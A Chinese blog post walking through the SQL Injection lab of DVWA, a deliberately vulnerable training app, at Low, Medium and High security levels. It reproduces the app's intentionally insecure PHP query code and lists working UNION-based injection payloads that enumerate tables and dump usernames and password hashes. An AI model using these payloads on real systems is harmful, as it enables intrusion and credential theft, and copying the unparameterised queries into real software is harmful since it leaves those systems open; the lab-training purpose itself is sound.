dvwa学习之七:SQL Injection

1.Low级别

核心代码:

<?php 
if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 
    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 
        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 
    mysqli_close($GLOBALS["___mysqli_ston"]); 
} 
?> 

使用REQUEST方法,未加入任何过滤措施,对于提交的请求直接参与SQL代码的查询

直接构造PAYLOAD: 

 判断字段数目:1' order by 2 #

union查询:-1' union select 1,2 #

查询database,version: -1' union select @@version,database()#

查询表: -1' union select group_concat(table_name),2 from information_schema.tables where table_schema=0x64767761 #

查询列: -1' union select group_concat(column_name),2 from information_schema.columns where table_name=0x75736572 #

查询值: -1' union select User,Password from users limit 0,1#

ID: -1' union select User,Password from users #
First name: admin
Surname: 19045673a5e3972fe7dde87da2e833b9

2. Medium级别

核心代码:

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 
    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 
        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 
} 
// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0]; 
mysqli_close($GLOBALS["___mysqli_ston"]); 
?> 


分析代码可知它就是通过POST方式提交id参数,之后并对参数id进行转义操作,但是此时的参数$id并没有加单引号,因此不需要加单引号进行闭合,可以直接进行union操作。
所以可是直接进行抓包突破列表限制,修改id内容,
id=-1 union select @@version,database() #&Submit=Submit
比着low级别少个单引号,后面一样。

3.HIGH级别

<?php 
if( isset( $_SESSION [ 'id' ] ) ) { 
    // Get input 
    $id = $_SESSION[ 'id' ]; 
    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); 
    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 
        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);         
} 
?> 

 

HIGH级别也很简单,注入点在session数组中,其中session中的id是通过post赋值,只需要修改提交的POST中的id即可,只是现实的界面不是在同一页面上。

posted @ 2017-08-21 11:36  vspiders  阅读(203)  评论(0编辑  收藏  举报